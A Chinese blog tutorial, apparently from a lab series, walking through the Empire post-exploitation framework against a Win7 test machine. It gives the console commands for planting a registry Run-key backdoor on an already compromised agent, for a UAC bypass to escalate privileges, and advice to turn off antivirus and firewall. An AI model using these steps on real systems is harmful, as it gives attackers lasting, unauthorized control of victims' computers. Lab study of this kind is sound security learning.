网站首页 > 技术教程 正文
做到这个实验我差不多盲猜到了,所谓的后渗透测试的含义了,他们都是基于已经攻破的系统,都已经拿到shell了,通过这些「后渗透」工具进行权限提升、权限维持、横向渗透。在上一个实验中,我们已经拿到了agent,那么我们就可以给这个agent对应的电脑注入后门了。操作非常简单,只需要两步,然后就坐等其成。
这是实验的前提:你要先拿到一个agent(重命名为ailx10)
ailx10:「后渗透测试」神器Empire入门
实验环境:
- 服务端:Kali OS
- 客户端:Win7
建议:关闭杀毒软件,关闭防火墙,不然实验可能不成功~
第一步:在完成第一个实验的基础上,进入模块
- 进入这个agent(interact ailx10)
- 进入模块(usemodule persistence/userland/registry)
第二步:开始下配置
- 下配置(set Name ailx10)
- 下配置(set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run)
这个时候就可以去目标主机上查看注册表了(regedit),发现已经成功注入了。也就是说,现在万事具备,只欠东风。那么,东风是什么呢?
第三步:重启电脑
- 没错,东风就是重启电脑,只要目标主机重启电脑,我们就获得了控制权~
- 所以啊,这就是长久的权限维持,懂了么,弟弟?
再来感受一下成功的喜悦,来个放大版的
- 接下来带大家随便逛逛,提升一下权限(bypassuac ailx10)
- 这里的ailx10不是agent,是之前设置的Name
- 新的agent重命名为ailx12(绿色的是激活的)
- 最早的agent(ailx10)已经挂掉了,变成红色的了
- 这个好处就是「渗透」是一次性的shell控制
- 「后渗透」是永久的shell控制
- 进入ailx12,输入sysinfo查看系统详情
本篇完~
猜你喜欢
- 2024-10-21 如何用Systemtap探索MySQL-爱可生
- 2024-10-21 详解linux内核网络数据包发送在UDP协议层的处理与监控
- 2024-10-21 Linux下docker基础环境搭建(linux配置docker)
- 2024-10-21 electron-vue技术篇(electron vue案例)
- 2024-10-21 docker的daemon.json能做什么?(docker dsm)
- 2024-10-21 系统调用使世界完美运行(系统调用可以完成)
- 2024-10-21 Linux 多线程应用中如何编写安全的信号处理函数
- 2024-10-21 检查和升级您的 Linux 内核版本(linux系统检查)
- 2024-10-21 克罗地亚、波黑,新型病毒BalkanDoor和BalkanRAT现身多个国家
- 2024-10-21 asar归档解包(galgame arc文件解包)
你 发表评论:
欢迎- 最近发表
-
- Win11学院:如何在Windows 11上使用WSL安装Ubuntu
- linux移植(Linux移植freemodbus)
- 独家解读:Win10预览版9879为何无法识别硬盘
- 基于Linux系统的本地Yum源搭建与配置(ISO方式、RPM方式)
- Docker镜像瘦身(docker 减小镜像大小)
- 在linux上安装ollama(linux安装locale)
- 渗透测试系统Kali推出Docker镜像(kali linux渗透测试技术详解pdf)
- Linux环境中部署Harbor私有镜像仓库
- linux之间传文件命令之Rsync傻瓜式教程
- 解决ollama在linux中安装或升级时,通过国内镜像缩短安装时长
- 标签列表
-
- 下划线是什么 (87)
- 精美网站 (58)
- qq登录界面 (90)
- nginx 命令 (82)
- nginx .http (73)
- nginx lua (70)
- nginx 重定向 (68)
- Nginx超时 (65)
- nginx 监控 (57)
- odbc (59)
- rar密码破解工具 (62)
- annotation (71)
- 红黑树 (57)
- 智力题 (62)
- php空间申请 (61)
- 按键精灵 注册码 (69)
- 软件测试报告 (59)
- ntcreatefile (64)
- 闪动文字 (56)
- guid (66)
- abap (63)
- mpeg 2 (65)
- column (63)
- dreamweaver教程 (57)
- excel行列转换 (56)
本文暂时没有评论,来添加一个吧(●'◡'●)